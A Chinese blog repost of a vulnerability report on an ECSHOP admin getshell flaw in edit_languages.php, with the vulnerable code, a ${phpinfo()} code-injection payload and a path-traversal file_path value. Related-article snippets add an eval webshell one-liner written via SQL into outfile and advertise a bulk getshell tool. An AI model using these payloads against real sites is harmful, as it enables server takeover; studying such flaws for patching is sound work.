admin/edit_languages.php,ECSHOP后台getshell漏洞

最新推荐文章于 2022-07-11 17:33:39 发布
最新推荐文章于 2022-07-11 17:33:39 发布
阅读量186 收藏
点赞数
文章标签: admin/edit_languages.php

### 简要描述:

ECSHOP 后台getshell

### 详细说明:

```

admin/edit_languages.php

elseif ($_REQUEST['act'] == 'edit')

{

/* 语言项的路径 */

$lang_file = isset($_POST['file_path']) ? trim($_POST['file_path']) : '';

/* 替换前的语言项 */

$src_items = !empty($_POST['item']) ? stripslashes_deep($_POST['item']) : '';

/* 修改过后的语言项 */

$dst_items = array();

$_POST['item_id'] = stripslashes_deep($_POST['item_id']);

for ($i = 0; $i < count($_POST['item_id']); $i++)

{

/* 语言项内容如果为空,不修改 */

if (trim($_POST['item_content'][$i]) == '')

{

unset($src_items[$i]);

}

else

{

$_POST['item_content'][$i] = str_replace('\\\\n', '\\n', $_POST['item_content'][$i]);

$dst_items[$i] = $_POST['item_id'][$i] .' = '. '"' .$_POST['item_content'][$i]. '";';//这里改成了双引号 可以用${ phpinfo()}来执行代码~~

}

}

```

### 漏洞证明:

测试方法

打开 127.0.0.1/ec/admin/edit_languages.php

搜索1

随便找一下 修改 值为${ phpinfo()}

然后抓包 点击确认

查看下filepath的参数

file_path=..%2Flanguages%2Fzh_cn%2Fuser.php

就知道修改的语言文件的名字 完了之后访问即可

[4.jpg](https://images.seebug.org/upload/201312/19175659ececbeb2ffcc5a2f06330d2c5c032e4e.jpg)

[_20131219175145.jpg](https://images.seebug.org/upload/201312/19175707e793fb939289eb8868a2f70300e8b45b.jpg)

[_20131219175158.jpg](https://images.seebug.org/upload/201312/19175715c0fd522e890c88ef8660248d1a11506b.jpg)

loading-bars.svg

weixin_39828457
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ecshop最新后台shell
06-18
ecshop最新后台shell
ecshop后台getshell
qq_45300786的博客
05-14 1446
他所信奉的这盏绿灯,这个一年年在我们眼前渐渐远去的极乐的未来,它从前逃离了我们的追求,不过那没关系,明天我们跑的更快一点,把胳膊伸得更远一点,等待某个美好的早晨,于是我们奋力向前,逆水行舟,直到回到美好往昔的纯真岁月。 现在我们试试第三种方法 访问这个地址, 然后抓包修改为POST,并添加如下框内代码 放包 然后随便找个订单查看 点击“打印订单” 点击“打印订单”后,就会生成一个test.php文件 shell工具连接 ...
admin/edit_languages.php,ecshop后台语言项执行漏洞edit_languages.php详解
weixin_30428981的博客
03-26 207
漏洞需要能登录ecshop后台权限,简单修改下语言项目,即可在网站植入木马后门。 以下是详细分析 1.登陆到ecshop台后,选择模板管理,语言项编辑,搜索用户信息 为什么要搜索用户该漏洞需要能登录ecshop后台权限,简单修改下语言项目,即可在网站植入木马后门。 以下是详细分析1.登陆到为什么要搜索“用户信息”,还可以搜索其它的吗?答案是搜索languages\zh_cn\user.php文件...
ECSHOP /mobile/admin/edit_languages.php
weixin_33918357的博客
01-20 117
  漏洞名称:ecshop代码注入漏洞 补丁编号:10017531 补丁文件:/mobile/admin/edit_languages.php 补丁来源:云盾自研 更新时间:2017-01-05 08:41:29 漏洞描述:ecshop后台模版编译导致黑客可插入任意恶意代码。   else { $_POST['item_con...
admin/edit_languages.php,ECSHOP后台getshell
weixin_42507981的博客
03-26 103
elseif ($_REQUEST['act'] == 'edit'){/* 语言项的路径 */$lang_file = isset($_POST['file_path']) ? trim($_POST['file_path']) : '';/* 替换前的语言项 */$src_items = !empty($_POST['item']) ? stripslashes_deep($_POST['it...
ecshop后台操作90个小问题(很常见的问题).txt
02-02
ecshop后台操作90个小问题(很常见的问题).txt
ecshop 后台
04-01
ecshop.电商的最好资料,易于理解,便于开发
aaa.rar_593aaa. com_ecshop_www .aaa709.com_www.aaa 647.com_商城
09-24
ECSHOP商城系统深度解析与定制实践》 ECSHOP是一款广泛应用于电子商务领域的开源网上商城系统,以其灵活性、可扩展性和易用性深受众多企业和开发者喜爱。标题中的"aaa.rar_593aaa....
ECShop_v3.6.0_UTF8_release170921.zip ECShop商城开源版本下载
10-02
ECShop是中国著名的B2C(Business-to-Consumer)独立网店系统,专为企业和个人提供解决方案,帮助他们快速搭建个性化网上商店。这个系统以其强大的功能、灵活的扩展性和友好的用户体验而受到众多用户的青睐。"ECShop...
ECShop_patch_20170921.zip ECSHOP 3.6最新版升级补丁
04-15
ECShop_patch_20170921.zip ECSHOP 3.6最新版升级补丁
批量getshell工具
09-08
2017最新版的批量getshell工具,最全的cms识别系统,最快的getshell行动,各种cms,各种漏洞,各种getshell,你值得拥有!
ECSHOP \admin\edit_languages.php GETSHELL Based On Injection PHP Code Into /languages/zh_cn/user.php
weixin_30763397的博客
11-11 122
目录 1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述 对于很多CMS网站来说,它们都需要保存很多的网站META信息,最常用的最佳实践是以变量声明的形式保存在.php文件中,在需要的时候直接include进来,PHP File Loader会自动将引入文件中的变量注册到当前的代码空间中,供其他的...
ecshop 解密index.php,Ecshop后台shell方法总结
weixin_29234423的博客
03-19 329
方法一:龙儿心发明的,版本未定,估计都行。进入后台-系统设置-Flash播放器管理可以上传任意文件。[includes/fckeditor /editor/filemanager/connectors/php/config.php文件对Media没有任何限制,直接Type=Media 上传你的webshell,访问路径为http://target/images/upload/Media/xxx.p...
ECSHOP后台getshell漏洞
11-25 5806
ECSHOP后台getshell漏洞 2014年03月20日00:55 阅读: 1733 次 标签: ECSHOP后台getshell漏洞 简要描述: ECSHOP 后台getshell 详细说明: admin/edit_languages.php elseif ($_REQUEST['act'] == 'edit') { /* 语言项的路径 */
Ecshop框架的Webshell
wo41ge的博客
12-19 289
一、登录情况 因为后台没有放东西 嘛 所以就啥也没有 这是后台地址 http://127.0.0.1/ecshop/admin/ 二、后台拿webshell三种思路演示 1、执行数据库命令拿webshell 首先需要找到可写入命令的页面: select '<?php eval($_POST[1])?>' into outfile' 最后经过测试?和into outfile都会报错 这里可以利用符号代替或者混淆的方式替换掉,最终的思路是写入一句话 在into outfile写入到改
ecshop后台0day漏洞原理+利用方法 XSS+Getshll
weixin_30469895的博客
11-20 5213
发布日期:2012-10.25 发布作者:dis9@ztz 漏洞类型:跨站攻击 代码执行 0x0 后台getshell 在 includes/cls_template.php fetch函数 /** * 处理模板文件 * * @access public * @param string $filename * @param sting $cache_id *...
127.网络安全渗透测试—[CMS后台 getwebshell]—[ecshop3.6后台 getwebshell]
qwsn
07-11 2698
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 进入后台,访问该页面:抓包,送入repeater模块,改为post模式,把此时请求体的act=edit_templates,放到get处请求体写入以下内容:(写入test.php,密码为a) ,然后点击订单列表—>点击查看—>点击,从而生成test.php蚁剑访问连接...
ecshop 通杀2.6*2.7 GBK版本 oday 爆路径 GetShell
weixin_33814685的博客
07-24 235
据说该0day是fjhgx(俺是农村的)大牛发现的。。。 Exp等黑小子发吧。。。或者自己手动也行。。。 以前很早的东西了 刚测试还可以用 至于有一些能不能搞 自行测试 这些东西都可以想起以前的兄弟们 我对这些已经不敢兴趣了 有什么好东西我会陆续放出 工具我会打包! ecshop 通杀2.6*2.7 GBK版本 附上测试图! (射出编码...
Ecshop后台shell方法总结
11-25 6702
方法一:龙儿心发明的,版本未定,估计都行。 进入后台-系统设置-Flash播放器管理 可以上传任意文件。 [includes/fckeditor /editor/filemanager/connectors/php/config.php文件对Media没有任何限制,直接Type=Media 上传你的webshell,访问路径为http://target/images/upload/M
: ecshop_ v4. 1. 6_ _utf8_ re lease20210624882 10902351063. zip
最新发布
09-15
ecshop_v4.1.6_utf8_re lease20210624882 10902351063.zip是一个文件的命名。根据命名可以推测出该文件是ECShop电商系统的一个版本,版本号是v4.1.6,并采用了UTF-8编码。文件名中的release20210624882表示该文件是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值